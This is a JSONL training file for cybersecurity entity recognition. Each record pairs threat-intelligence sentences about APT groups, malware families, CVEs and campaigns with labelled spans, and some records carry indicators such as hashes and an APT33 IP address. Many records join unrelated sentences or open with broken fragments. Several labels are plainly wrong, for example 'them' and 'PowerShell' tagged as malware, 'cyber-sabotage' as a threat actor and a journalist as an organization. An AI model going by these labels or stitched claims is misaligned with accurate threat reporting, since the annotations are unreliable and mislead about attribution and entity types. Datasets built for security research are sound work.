To enhance the effectiveness of phishing attacks into the organization , Barium will collect additional background informationfrom social media sites .", "spans": {"MALWARE: them": [[22, 26]], "THREAT_ACTOR: Barium": [[236, 242]], "ORGANIZATION: social media": [[294, 306]]}, "info": {"id": "cyberner_stix_train_004266", "source": "cyberner_stix_train"}} {"text": "As a result , due to such an unusual compilation process , there were signs in the dex file that point to dexlib , a library used by the Smali tool to assemble dex files . The installed EXE file is almost exactly the same as the DLL version of Bisonal variant used against the Russian organization . Upon execution , this malware creates 10 random directory paths and uses them for a specially designated purpose .", "spans": {"MALWARE: installed EXE file": [[176, 194]], "MALWARE: Bisonal variant": [[244, 259]]}, "info": {"id": "cyberner_stix_train_004267", "source": "cyberner_stix_train"}} {"text": "This loads the SWF file , effectively running the malicious code on the system .", "spans": {"TOOL: SWF": [[15, 18]]}, "info": {"id": "cyberner_stix_train_004268", "source": "cyberner_stix_train"}} {"text": "This server runs an instance of ‘ Parse Server ’ ( source on GitHub ) , an open source version of the Parse Backend infrastructure , which is a model for providing web app and mobile app developers with a way to link their applications to backend cloud storage and APIs exposed by back-end applications , while also providing features such as user management , push notifications and more . Utilizing KillDisk in the attack scenario most likely served one of two purposes : the attackers covering their tracks after an espionage operation , or it was used directly for extortion or cyber-sabotage . 
During this time they were able to steal digital certificates from South Korean companies and launch attacks against Indian and Saudi Arabian government organizations .", "spans": {"ORGANIZATION: GitHub": [[61, 67]], "TOOL: KillDisk": [[401, 409]], "THREAT_ACTOR: attackers": [[478, 487]], "THREAT_ACTOR: cyber-sabotage": [[582, 596]], "ORGANIZATION: companies": [[679, 688]], "ORGANIZATION: government organizations": [[741, 765]]}, "info": {"id": "cyberner_stix_train_004269", "source": "cyberner_stix_train"}} {"text": "Yamato Transport - One of Japan 's largest door-to-door delivery service companies , also in Tokyo . Following the exposure of a wide range of their infrastructure and operations by Symantec earlier this year , we discovered that APT33 , or closely aligned actors , reacted by either parking or reassigning some of their domain infrastructure . of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": {"ORGANIZATION: Yamato Transport": [[0, 16]], "ORGANIZATION: Symantec": [[182, 190]], "THREAT_ACTOR: APT33": [[230, 235]], "THREAT_ACTOR: Gorgon Group": [[380, 392]], "ORGANIZATION: governmental organizations": [[403, 429]]}, "info": {"id": "cyberner_stix_train_004270", "source": "cyberner_stix_train"}} {"text": "DanderSpritz consists entirely of plugins to gather intelligence , use exploits and examine already controlled machines . 
According to a 49-page report published Thursday , all of the attacks are the work of Chinese government 's intelligence apparatus , which the report 's authors dub the Winnti Umbrella .", "spans": {"TOOL: DanderSpritz": [[0, 12]], "THREAT_ACTOR: Winnti Umbrella": [[291, 306]]}, "info": {"id": "cyberner_stix_train_004271", "source": "cyberner_stix_train"}} {"text": "This is in stark contrast to some other suspected Russian threat actors ( such as Operation Pawn Storm ) who appear to have increased their targeting of Ukraine following the crisis .", "spans": {}, "info": {"id": "cyberner_stix_train_004272", "source": "cyberner_stix_train"}} {"text": "This high level of cyber-espionage activity goes back years .", "spans": {}, "info": {"id": "cyberner_stix_train_004273", "source": "cyberner_stix_train"}} {"text": "In our analysis , one activity group stood out : NEODYMIUM . Analysis of the operational times of the group 's activities indicates that it is probably centered around China Standard Time ( UTC +8 ) . A bot identifier is generated from the machine’s MAC address . In an article for DarkReading , Ericka Chickowski highlights 15 key indicators of compromise", "spans": {"MALWARE: NEODYMIUM": [[49, 58]], "THREAT_ACTOR: group": [[102, 107]], "ORGANIZATION: DarkReading": [[282, 293]], "ORGANIZATION: Ericka Chickowski": [[296, 313]]}, "info": {"id": "cyberner_stix_train_004274", "source": "cyberner_stix_train"}} {"text": "With a bit of luck , we managed to find logs in which the evidence showed “ Agent Smith ’ s C & C front end routinely distributes a workload between “ w.h * * * g.com ” and “ tt.a * * * d.net ” . This activity is a longer tail for the actor than a spearphish ; this is likely based on the Clever Kitten background , which may be focused on web development/application testing . Using msiexec.exe , a legitimate system process , can make it harder to trace the source of malicious activity . 
FireEye currently tracks this activity in three clusters , UNC2639 , UNC2640 , and UNC2643 .", "spans": {"MALWARE: Agent Smith": [[76, 87]], "FILEPATH: msiexec.exe": [[384, 395]], "ORGANIZATION: FireEye": [[491, 498]], "THREAT_ACTOR: UNC2639": [[550, 557]], "THREAT_ACTOR: UNC2640": [[560, 567]], "THREAT_ACTOR: UNC2643": [[574, 581]]}, "info": {"id": "cyberner_stix_train_004275", "source": "cyberner_stix_train"}} {"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . Contextually relevant emails are sent to specific targets with attached documents that are packed with exploit code and Trojan horse programmes designed to take advantage of vulnerabilities in software installed on the target 's computer .", "spans": {"ORGANIZATION: government officials": [[28, 48]], "MALWARE: malicious Microsoft Word document": [[90, 123]], "VULNERABILITY: CVE-2012-0158": [[143, 156]], "TOOL: emails": [[223, 229]], "FILEPATH: documents": [[273, 282]], "VULNERABILITY: exploit": [[304, 311]], "MALWARE: Trojan": [[321, 327]]}, "info": {"id": "cyberner_stix_train_004276", "source": "cyberner_stix_train"}} {"text": "One curious trait of Bahamut is that it develops fully-functional applications in support of its espionage activities , rather than push nonfunctional fake apps or bundle malware with legitimate software . CTU researchers have evidence that the TG-3390 compromised U.S. 
and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations .", "spans": {"TOOL: legitimate software": [[184, 203]], "ORGANIZATION: CTU": [[206, 209]], "THREAT_ACTOR: TG-3390": [[245, 252]], "ORGANIZATION: manufacturing": [[320, 333]], "ORGANIZATION: aerospace": [[349, 358]], "ORGANIZATION: defense contractors": [[371, 390]], "ORGANIZATION: automotive": [[395, 405]], "ORGANIZATION: technology": [[408, 418]], "ORGANIZATION: energy": [[421, 427]], "ORGANIZATION: pharmaceuticals": [[434, 449]], "ORGANIZATION: education": [[454, 463]], "ORGANIZATION: legal": [[470, 475]]}, "info": {"id": "cyberner_stix_train_004277", "source": "cyberner_stix_train"}} {"text": "Interestingly , that location may be either a web address or a Microsoft OneDrive account .", "spans": {"ORGANIZATION: Microsoft": [[63, 72]], "TOOL: OneDrive": [[73, 81]]}, "info": {"id": "cyberner_stix_train_004278", "source": "cyberner_stix_train"}} {"text": "After its foray into overt and disruptive attacks in 2016 , the group has subsequently returned to its roots , mounting intelligence gathering operations against a range of targets .", "spans": {}, "info": {"id": "cyberner_stix_train_004279", "source": "cyberner_stix_train"}} {"text": "If , for some reason , SuperService does not switch off the screen when there is an attempt to revoke the device administrator privileges , the Trojan tries to intimidate the user : While running , Rotexy tracks the following : switching on and rebooting of the phone ; termination of its operation – in this case , it relaunches ; sending of an SMS by the app – in this case , the phone is switched to silent mode . 
Analysts in our DeepSight Managed Adversary and Threat Intelligence ( MATI ) team have found a new backdoor , Backdoor.Powemuddy , new variants of Seedworm 's Powermud backdoor ( aka POWERSTATS ) , a GitHub repository used by the group to store their scripts , as well as several post-compromise tools the group uses to exploit victims once they have established a foothold in their network . The campaign 's use of an SMB worm to distribute WCry contributed to the ransomware 's virulence .", "spans": {"MALWARE: Rotexy": [[198, 204]], "ORGANIZATION: DeepSight Managed Adversary and Threat Intelligence": [[433, 484]], "ORGANIZATION: MATI": [[487, 491]], "MALWARE: Backdoor.Powemuddy": [[527, 545]], "THREAT_ACTOR: Seedworm": [[564, 572]], "MALWARE: Powermud backdoor": [[576, 593]], "TOOL: POWERSTATS": [[600, 610]], "THREAT_ACTOR: group": [[647, 652], [723, 728]], "MALWARE: SMB worm": [[836, 844]], "MALWARE: WCry": [[859, 863]]}, "info": {"id": "cyberner_stix_train_004280", "source": "cyberner_stix_train"}} {"text": "There were several distinct areas where mobile malware underwent advances . LuckyMouse , also known as Iron Tiger , EmissaryPanda , APT 27 and Threat Group-3390 , is the same group of Chinese hackers who was found targeting Asian countries with Bitcoin mining malware early this year . We have contacted the compromised universities and provided the necessary information and assistance to remediate the compromise . Additional attacker backdoors identified on systems with names that masquaraded as legitimate binaries and also produced AOT files upon translation ( e.g. 
, npx - cli and npx-cli.aot ) .", "spans": {"THREAT_ACTOR: LuckyMouse": [[76, 86]], "THREAT_ACTOR: Iron Tiger": [[103, 113]], "THREAT_ACTOR: EmissaryPanda": [[116, 129]], "THREAT_ACTOR: APT 27": [[132, 138]], "THREAT_ACTOR: Threat Group-3390": [[143, 160]], "TOOL: Bitcoin mining malware": [[245, 267]], "THREAT_ACTOR: attacker backdoors": [[428, 446]]}, "info": {"id": "cyberner_stix_train_004281", "source": "cyberner_stix_train"}} {"text": "Nevertheless , on May 12th 2015 ( a few weeks after the attack against Bundestag appears to have started ) the American security firm root9B released a report containing details on malware samples very similar to Artifact #2 .", "spans": {"ORGANIZATION: Bundestag": [[71, 80]]}, "info": {"id": "cyberner_stix_train_004282", "source": "cyberner_stix_train"}} {"text": "The hackers will map a company’s network and look for strategically favorable locations for placing their malware . To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit , deployment of Black Lambert included a rather sophisticated TTF zero day exploit , CVE-2014-4148 .", "spans": {"THREAT_ACTOR: hackers": [[4, 11]], "MALWARE: Lamberts toolkit": [[185, 201]], "MALWARE: Black Lambert": [[218, 231]], "VULNERABILITY: zero day": [[268, 276]], "VULNERABILITY: exploit": [[277, 284]], "VULNERABILITY: CVE-2014-4148": [[287, 300]]}, "info": {"id": "cyberner_stix_train_004283", "source": "cyberner_stix_train"}} {"text": "] databit [ . The first attack started in early July with a ShimRatReporter payload . The POST URI is changed to /bbs/ search.asp ( as mentioned , earlier Aumlib variants used a POST URI of /bbs/ info.asp . ) The POST body is now encoded . 
FireEye currently tracks this activity in three clusters , UNC2639 , UNC2640 , and UNC2643 .", "spans": {"MALWARE: ShimRatReporter": [[60, 75]], "FILEPATH: search.asp": [[119, 129]], "MALWARE: Aumlib": [[155, 161]], "FILEPATH: info.asp": [[196, 204]], "ORGANIZATION: FireEye": [[240, 247]], "THREAT_ACTOR: UNC2639": [[299, 306]], "THREAT_ACTOR: UNC2640": [[309, 316]], "THREAT_ACTOR: UNC2643": [[323, 330]]}, "info": {"id": "cyberner_stix_train_004284", "source": "cyberner_stix_train"}} {"text": "In particular , EventBot can intercept SMS messages and bypass two-factor authentication mechanisms . The operation against the Tibetan Parliamentarians illustrates the continued use of malicious attachments in the form of documents bearing exploits . The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept ( POC ) code to install a Trojan called Emissary , which is related to the Operation Lotus Blossom campaign .", "spans": {"MALWARE: EventBot": [[16, 24]], "ORGANIZATION: Tibetan Parliamentarians": [[128, 152]], "MALWARE: malicious attachments": [[186, 207]], "TOOL: documents bearing exploits": [[223, 249]], "THREAT_ACTOR: actors": [[256, 262]], "VULNERABILITY: exploit": [[276, 283]], "VULNERABILITY: CVE-2014-6332": [[284, 297]], "MALWARE: Trojan": [[382, 388]], "MALWARE: Emissary": [[396, 404]]}, "info": {"id": "cyberner_stix_train_004285", "source": "cyberner_stix_train"}} {"text": "Given that both organizations appear to describe similar ( if not identical ) activity , any reasonable person could ( and should ) ask – why the inconsistency in naming and identification? 
Aside from the competitive vendor naming landscape ( which I am not a fan of in cases on direct overlap , but which has more to say for itself when different methodologies are employed around similar observations ) , the distinction between FireEye and Dragos ’ approaches with respect to the “ TRITON actor ” comes down to fundamental philosophical differences in methodology .", "spans": {"ORGANIZATION: FireEye": [[431, 438]], "ORGANIZATION: Dragos": [[443, 449]], "MALWARE: TRITON": [[485, 491]]}, "info": {"id": "cyberner_stix_train_004286", "source": "cyberner_stix_train"}} {"text": "The new IP addresses are typically on the same subnet as the previous ones .", "spans": {}, "info": {"id": "cyberner_stix_train_004287", "source": "cyberner_stix_train"}} {"text": "Destructive malware used by VOODOO BEAR includes a wiper called PassKillDisk . Further tracking of the Lazarus’s activities has enabled Kaspersky researchers to discover a new operation , active since at least November 2018 , which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers .", "spans": {"THREAT_ACTOR: VOODOO BEAR": [[28, 39]], "TOOL: PassKillDisk": [[64, 76]], "THREAT_ACTOR: Lazarus’s": [[103, 112]], "ORGANIZATION: Kaspersky": [[136, 145]], "MALWARE: PowerShell": [[241, 251]], "SYSTEM: Windows": [[263, 270]], "ORGANIZATION: Apple customers": [[308, 323]]}, "info": {"id": "cyberner_stix_train_004288", "source": "cyberner_stix_train"}} {"text": "Gooligan-infected apps can also be installed using phishing scams where attackers broadcast links to infected apps to unsuspecting users via SMS or other messaging services . Based on details published in the DOJ complaint against North Korean programmer Park Jin Hyok , we know that APT38 and other cyber operators linked to TEMP.Hermit are associated with Lab 110 , an organization subordinate to or synonymous with the 6th Technical Bureau in North Korea 's Reconnaissance General Bureau ( RGB ) . 
This results in The email would start a conversation between the attackers and victims sometimes being quite lengthy to establish trust , which would include the attackers encouraging the victim to open a registration link hosted by a real website that had already been compromised by the attackers .", "spans": {"MALWARE: Gooligan-infected": [[0, 17]], "THREAT_ACTOR: APT38": [[284, 289]], "THREAT_ACTOR: cyber operators": [[300, 315]], "THREAT_ACTOR: TEMP.Hermit": [[326, 337]], "ORGANIZATION: Lab 110": [[358, 365]], "THREAT_ACTOR: the attackers": [[659, 672]], "ORGANIZATION: victim": [[689, 695]]}, "info": {"id": "cyberner_stix_train_004289", "source": "cyberner_stix_train"}} {"text": "First , they use the built-in toolbox commands to determine what apps are running . Group123 is constantly evolving as the new fileless capability that was added to ROKRAT demonstrates . Another obfuscation , This article is based on research by Marcelo Rivero , Malwarebytes ' ransomware specialist , who monitors information published by ransomware gangs on their Dark Web sites .", "spans": {"THREAT_ACTOR: Group123": [[84, 92]], "TOOL: ROKRAT": [[165, 171]], "ORGANIZATION: Marcelo Rivero": [[246, 260]], "ORGANIZATION: Malwarebytes ' ransomware specialist": [[263, 299]], "THREAT_ACTOR: ransomware gangs": [[340, 356]], "TOOL: Dark Web sites": [[366, 380]]}, "info": {"id": "cyberner_stix_train_004290", "source": "cyberner_stix_train"}} {"text": "TG-3390 's activities indicate a preference for leveraging SWCs and scan-and-exploit techniques to compromise target systems . 
The samples Novetta obtained from the active Axiom infection were compiled in mid- to late 2014 and represent what Novetta is referring to as version 3.0 of the Winnti lineage .", "spans": {"ORGANIZATION: Novetta": [[139, 146], [242, 249]], "THREAT_ACTOR: Winnti": [[288, 294]]}, "info": {"id": "cyberner_stix_train_004291", "source": "cyberner_stix_train"}} {"text": "On April 3 , 2016 , we still observed new RuMMS samples emerging in the wild . Data about Wingbird activity indicates that it is typically used to attack individuals and individual computers instead of networks . Hash : e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8 . While COSMICENERGY ’s capabilities are not significantly different from previous OT malware families ’ , its discovery highlights several notable developments in the OT threat landscape .", "spans": {"MALWARE: RuMMS": [[42, 47]], "FILEPATH: e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8": [[220, 284]], "MALWARE: COSMICENERGY ’s": [[293, 308]], "MALWARE: OT malware families": [[368, 387]]}, "info": {"id": "cyberner_stix_train_004292", "source": "cyberner_stix_train"}} {"text": "Over a few days' span , the threat actors install remote access tools on additional systems based upon the results of the network reconnaissance .", "spans": {}, "info": {"id": "cyberner_stix_train_004293", "source": "cyberner_stix_train"}} {"text": "The additions include code to decrypt an embedded Flash object and an event handler that calls a newly added function ( “ skinEvent2 ” ) that plays the decrypted object .", "spans": {"TOOL: Flash": [[50, 55]]}, "info": {"id": "cyberner_stix_train_004294", "source": "cyberner_stix_train"}} {"text": "This very first step fails in Android 7.0 and higher , even with a root permission . The main point that sets Operation Groundbait apart from the other attacks is that it has mostly been targeting anti-government separatists in the self-declared Donetsk and Luhansk People's Republics . 
This BLACKCOFFEE variant contains one or more URLs that link to the biography sections of attacker-created profiles as well as forum threads that contain comments from those same profiles . This model is flexible and enables the operators to constantly change how their backdoors retrieve further commands or malcode as needed .", "spans": {"SYSTEM: Android 7.0": [[30, 41]], "ORGANIZATION: anti-government separatists": [[197, 224]], "MALWARE: BLACKCOFFEE": [[292, 303]]}, "info": {"id": "cyberner_stix_train_004295", "source": "cyberner_stix_train"}} {"text": "] orgmary-crawley [ . We named it RedOctober because we started this investigation in October 2012 , an unusually hot month . Typical use of HTRAN is fairly simple : the attacker must specify the originating IP address ( of his or her workstation in Shanghai ) , and a port on which to accept connections . This makes Greatness particularly well - suited for phishing business users .", "spans": {"TOOL: HTRAN": [[141, 146]], "THREAT_ACTOR: phishing business users": [[359, 382]]}, "info": {"id": "cyberner_stix_train_004296", "source": "cyberner_stix_train"}} {"text": "App Swap Per Device Avg . One of its file stealers , swissknife2 , abuses a cloud storage service as a repository of exfiltrated files . Many of the URLs listed were in use for an extended period . The file , matches signatures for the tried - and - true China Chopper .", "spans": {"TOOL: swissknife2": [[53, 64]], "THREAT_ACTOR: the tried - and - true China Chopper": [[232, 268]]}, "info": {"id": "cyberner_stix_train_004297", "source": "cyberner_stix_train"}} {"text": "Technical Analysis XLoader first loads the encrypted payload from Assets/db as test.dex to drop the necessary modules then requests for device administrator privileges . At least 4 attack campaigns against Pakistan have been observed by us since 2017 . 
Then it invokes the renamed executable and runs it passing a series of parameter : “ uninstall.exe x -pQELRatcwbU2EJ5 -y ”", "spans": {"MALWARE: XLoader": [[19, 26]], "FILEPATH: uninstall.exe": [[338, 351]]}, "info": {"id": "cyberner_stix_train_004298", "source": "cyberner_stix_train"}} {"text": "? After the phishing email resulted in a successful infiltration , ITG08 used the More_eggs backdoor to gain a foothold and infect additional devices . We consider APT38 's operations more global and highly specialized for targeting the financial sector .", "spans": {"THREAT_ACTOR: ITG08": [[67, 72]], "TOOL: More_eggs backdoor": [[82, 100]], "THREAT_ACTOR: APT38": [[164, 169]], "ORGANIZATION: financial sector": [[237, 253]]}, "info": {"id": "cyberner_stix_train_004299", "source": "cyberner_stix_train"}} {"text": "Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 . One vulnerability is a Windows zero-day vulnerability ( CVE-2019-0703 ) discovered by Symantec . Bemstour exploits two Windows vulnerabilities in order to achieve remote kernel code execution on targeted computers .", "spans": {"THREAT_ACTOR: Patchwork": [[9, 18]], "MALWARE: RTF files": [[45, 54]], "VULNERABILITY: CVE-2017-8570": [[66, 79]], "SYSTEM: Windows": [[105, 112], [201, 208]], "VULNERABILITY: zero-day": [[113, 121]], "VULNERABILITY: CVE-2019-0703": [[138, 151]], "ORGANIZATION: Symantec": [[168, 176]], "THREAT_ACTOR: Bemstour": [[179, 187]], "VULNERABILITY: vulnerabilities": [[209, 224]]}, "info": {"id": "cyberner_stix_train_004300", "source": "cyberner_stix_train"}} {"text": "Incident Background Beginning on Oct. 24 at 08:00 UTC , FireEye detected and blocked attempts to infect multiple clients with a drive-by download masquerading as a Flash Update (install_flash_player.exe) that delivered a wormable variant of ransomware . 
The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": {"ORGANIZATION: FireEye": [[56, 63]], "MALWARE: (install_flash_player.exe)": [[177, 203]], "MALWARE: ransomware": [[241, 251]], "THREAT_ACTOR: BlackOasis": [[314, 324]], "ORGANIZATION: Kaspersky": [[327, 336]], "TOOL: Adobe Flash Player": [[370, 388]], "VULNERABILITY: zero-day": [[389, 397]], "VULNERABILITY: CVE-2016-4117": [[414, 427]], "MALWARE: FinSpy": [[474, 480]]}, "info": {"id": "cyberner_stix_train_004301", "source": "cyberner_stix_train"}} {"text": "However , this time , the permission is actually used . security policy in the Eastern Europe and South Caucasus regions . Attached to this email was a malicious Microsoft Word document ( MD5: f6fafb7c30b1114befc93f39d0698560 ) that exploited CVE-2012-0158 . TEMP.Veles has used port - protocol mismatches on ports such as 443 , 4444 , 8531 , and 50501 during C2 .", "spans": {"TOOL: email": [[140, 145]], "ORGANIZATION: Microsoft": [[162, 171]], "TOOL: Word": [[172, 176]], "FILEPATH: f6fafb7c30b1114befc93f39d0698560": [[193, 225]], "VULNERABILITY: CVE-2012-0158": [[243, 256]], "MALWARE: TEMP.Veles": [[259, 269]], "SYSTEM: C2": [[360, 362]]}, "info": {"id": "cyberner_stix_train_004302", "source": "cyberner_stix_train"}} {"text": "It turns out that contacts data isn’t the only unusual data SWAnalytics is interested in . 
This function is similar to the various versions of backdoors ( such as sctrls and sip_telephone ) that we analyzed in our previous blog post and whitepaper .", "spans": {"MALWARE: SWAnalytics": [[60, 71]], "MALWARE: sctrls": [[163, 169]], "MALWARE: sip_telephone": [[174, 187]]}, "info": {"id": "cyberner_stix_train_004303", "source": "cyberner_stix_train"}} {"text": "An investigation of Chrysaor Malware on Android 03 April 2017 Google is constantly working to improve our systems that protect users from Potentially Harmful Applications ( PHAs ) . During our investigation , there was a breakthrough discovery that helped connect Leafminer to a number of attacks observed on systems in the Middle East and identify the toolkit used in the group 's efforts of intrusion , lateral movement , and exfiltration . APT33 : 192.119.15.35 [REDACTED].ddns.net . As such , we ’ve seen a growing number of reports of victims who are targeted with commercial spyware .", "spans": {"MALWARE: Chrysaor": [[20, 28]], "SYSTEM: Android": [[40, 47]], "ORGANIZATION: Google": [[62, 68]], "THREAT_ACTOR: Leafminer": [[264, 273]], "THREAT_ACTOR: group": [[373, 378]], "THREAT_ACTOR: APT33": [[443, 448]], "IP_ADDRESS: 192.119.15.35": [[451, 464]], "DOMAIN: [REDACTED].ddns.net": [[465, 484]]}, "info": {"id": "cyberner_stix_train_004304", "source": "cyberner_stix_train"}} {"text": "However , the group ’s activities since the beginning of 2017 have again become more covert and appear to be mainly motivated by intelligence gathering .", "spans": {}, "info": {"id": "cyberner_stix_train_004305", "source": "cyberner_stix_train"}} {"text": "TrickMo is no different ; the goal is to complete the operation while raising minimal suspicion . Since they were first identified in January 2-16 , this adversary has consistently targeted large organizations for high ransom demands . 
Strider has been active since at least October 2011 .", "spans": {"MALWARE: TrickMo": [[0, 7]], "THREAT_ACTOR: Strider": [[236, 243]]}, "info": {"id": "cyberner_stix_train_004306", "source": "cyberner_stix_train"}} {"text": "Targets of the campaign received Microsoft Word documents via email that claimed to contain instructions for logging into webmail or information regarding a state law proposal .", "spans": {"TOOL: Microsoft Word documents": [[33, 57]], "TOOL: email": [[62, 67]], "TOOL: webmail": [[122, 129]]}, "info": {"id": "cyberner_stix_train_004307", "source": "cyberner_stix_train"}} {"text": "In 2015 and 2016 , Dridex was one of the most prolific eCrime banking trojans on the market and , since 2014 , those efforts are thought to have netted INDRIK SPIDER millions of dollars in criminal profits . According to 360 Threat Intelligence Center , Goldmouse was observed deploying the nebulous njRAT backdoor .", "spans": {"TOOL: Dridex": [[19, 25]], "ORGANIZATION: banking": [[62, 69]], "THREAT_ACTOR: INDRIK SPIDER": [[152, 165]], "ORGANIZATION: 360 Threat Intelligence Center": [[221, 251]], "MALWARE: njRAT backdoor": [[300, 314]]}, "info": {"id": "cyberner_stix_train_004308", "source": "cyberner_stix_train"}} {"text": "Accessibility features are typically used to help users with disabilities by giving the device the ability to write into input fields , auto-generate permissions , perform gestures for the user , etc . Today , this malware is still actively being used against the Philippines . 
M-Trends 2018 can arm security teams with the knowledge they need to defend against today 's most often used cyber attacks , as well as lesser seen and emerging threats .", "spans": {"MALWARE: malware": [[215, 222]], "ORGANIZATION: M-Trends": [[278, 286]]}, "info": {"id": "cyberner_stix_train_004309", "source": "cyberner_stix_train"}} {"text": "On the 14th of November , F-Secure published a blog post naming the malware OnionDuke and associating it with MiniDuke and CosmicDuke , the other Duke toolsets known at the time .", "spans": {"ORGANIZATION: F-Secure": [[26, 34]], "MALWARE: OnionDuke": [[76, 85]], "MALWARE: MiniDuke": [[110, 118]], "MALWARE: CosmicDuke": [[123, 133]], "THREAT_ACTOR: Duke": [[146, 150]]}, "info": {"id": "cyberner_stix_train_004310", "source": "cyberner_stix_train"}} {"text": "Information about the C&C infrastructure identified in our analysis of Suckfly activity can be seen in Table 1 .", "spans": {"TOOL: C&C": [[22, 25]], "THREAT_ACTOR: Suckfly": [[71, 78]]}, "info": {"id": "cyberner_stix_train_004311", "source": "cyberner_stix_train"}} {"text": "Finally , the malware spawns a thread that has the goal to load , remap , and relocate the stage 5 malware . Mandiant has previously observed targeted attackers stealing email , but few threat actors have been as successful at this as APT35 . While this loader differs somewhat in general implementation , the payload extraction routine seems to be the same as in the previous variant . 
In this incident , the attacker leveraged an EOL version of the MicroSCADA supervisory control system .", "spans": {"ORGANIZATION: Mandiant": [[109, 117]], "THREAT_ACTOR: attackers": [[151, 160]], "THREAT_ACTOR: threat actors": [[186, 199]], "THREAT_ACTOR: APT35": [[235, 240]], "SYSTEM: EOL": [[432, 435]], "SYSTEM: MicroSCADA": [[451, 461]]}, "info": {"id": "cyberner_stix_train_004312", "source": "cyberner_stix_train"}} {"text": "Analysis of a threat group's targeting , origin , and competencies can determine which organizations could be at risk .", "spans": {}, "info": {"id": "cyberner_stix_train_004313", "source": "cyberner_stix_train"}} {"text": "Subsequently , two additional articles ( here and here ) were released by Objective-See which provide an analysis of some validated WINDSHIFT samples targeting OSX systems . APT28 is using novel techniques involving the EternalBlue exploits and the open source tool Responder to spread laterally through networks and likely target travelers .", "spans": {"ORGANIZATION: Objective-See": [[74, 87]], "TOOL: WINDSHIFT samples": [[132, 149]], "THREAT_ACTOR: APT28": [[174, 179]], "VULNERABILITY: EternalBlue": [[220, 231]], "VULNERABILITY: exploits": [[232, 240]], "MALWARE: open source tool": [[249, 265]], "MALWARE: Responder": [[266, 275]]}, "info": {"id": "cyberner_stix_train_004314", "source": "cyberner_stix_train"}} {"text": "FAKE REVIEWS When early versions of apps are first published , many five star reviews appear with comments like : “ So .. good .. ” “ very beautiful ” Later , 1 star reviews from real users start appearing with comments like : “ Deception ” “ The app is not honest … ” SUMMARY Sheer volume appears to be the preferred approach for Bread developers . Researchers from various security organizations have used a variety of names to assign responsibility for the hacks , including LEAD , BARIUM , Wicked Panda , GREF , PassCV , Axiom , and Winnti . 
In versions 3.1 – 3.21, the configuration info is xor encoded with 0x85 . Most fraudsters create one - time email addresses or use stolen email addresses , both of which are easy to create or obtain .", "spans": {"MALWARE: Bread": [[331, 336]], "THREAT_ACTOR: LEAD": [[478, 482]], "THREAT_ACTOR: BARIUM": [[485, 491]], "THREAT_ACTOR: Wicked Panda": [[494, 506]], "THREAT_ACTOR: GREF": [[509, 513]], "THREAT_ACTOR: PassCV": [[516, 522]], "THREAT_ACTOR: Axiom": [[525, 530]], "THREAT_ACTOR: Winnti": [[537, 543]], "THREAT_ACTOR: fraudsters": [[625, 635]]}, "info": {"id": "cyberner_stix_train_004315", "source": "cyberner_stix_train"}} {"text": "In 2014 , our colleagues at Crowdstrike wrote an expos about a long-standing Chinese APT threat group they self-named Putter Panda , which Mandiant / FireEye refers to as APT2 . China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool .", "spans": {"ORGANIZATION: Crowdstrike": [[28, 39]], "THREAT_ACTOR: APT threat group": [[85, 101]], "THREAT_ACTOR: Putter Panda": [[118, 130]], "ORGANIZATION: Mandiant": [[139, 147]], "ORGANIZATION: FireEye": [[150, 157]], "THREAT_ACTOR: APT2": [[171, 175]], "FILEPATH: China Chopper": [[178, 191]], "THREAT_ACTOR: attackers": [[214, 223]]}, "info": {"id": "cyberner_stix_train_004316", "source": "cyberner_stix_train"}} {"text": "Unlike newer samples , this one created a unique file sloo.exe .", "spans": {"FILEPATH: sloo.exe": [[54, 62]]}, "info": {"id": "cyberner_stix_train_004317", "source": "cyberner_stix_train"}} {"text": "Unlike other rooting malware , this Trojan not only installs its modules into the system , it also injects malicious code into the system runtime libraries . In addition to the legitimate AmmyAdmin tool , the hackers used Visconti Backdoor developed based on legitimate RMS ( remote manipulator system ) software . 
The macro code inside the remote OLE document contains PowerShell commands that download and execute the final payload . ( Forbes , Gizmodo ) • Vulnerability Roundup : Memory corruption vulnerability in Microsoft Edge ; MilesightVPN and router could be taken over • Malicious Microsoft Drivers Could Number in the Thousands : Cisco Talos • New Threat Actor Launches Cyber - attacks on Ukraine and Poland •", "spans": {"TOOL: AmmyAdmin tool": [[188, 202]], "TOOL: Visconti Backdoor": [[222, 239]], "TOOL: RMS": [[270, 273]], "TOOL: OLE": [[348, 351]], "TOOL: PowerShell": [[370, 380]], "ORGANIZATION: Forbes": [[438, 444]], "ORGANIZATION: Gizmodo": [[447, 454]], "VULNERABILITY: Memory corruption vulnerability": [[483, 514]], "TOOL: Microsoft Edge": [[518, 532]], "SYSTEM: MilesightVPN": [[535, 547]], "TOOL: Malicious Microsoft Drivers": [[581, 608]], "ORGANIZATION: Cisco Talos": [[641, 652]], "THREAT_ACTOR: Cyber - attacks": [[681, 696]]}, "info": {"id": "cyberner_stix_train_004318", "source": "cyberner_stix_train"}} {"text": "The first webview overlay is created on step 6 of the activation cycle . We attribute this activity to TEMP.Zagros ( reported by Palo Alto Networks and Trend Micro ) , an Iran-nexus actor that has been active since at least May 2017 . The newer sample appears to be a re-write for optimization purposes with the underlying behavior remaining the same , reverse shell . First , the endpoint , used for informing clients about services offered by the remote Microsoft Exchange server , is accessed using an authenticated request to the frontend .", "spans": {"THREAT_ACTOR: TEMP.Zagros": [[103, 114]], "ORGANIZATION: Palo Alto Networks": [[129, 147]], "ORGANIZATION: Trend Micro": [[152, 163]], "THREAT_ACTOR: actor": [[182, 187]], "TOOL: reverse shell": [[353, 366]]}, "info": {"id": "cyberner_stix_train_004319", "source": "cyberner_stix_train"}} {"text": "The collection of basic device information . 
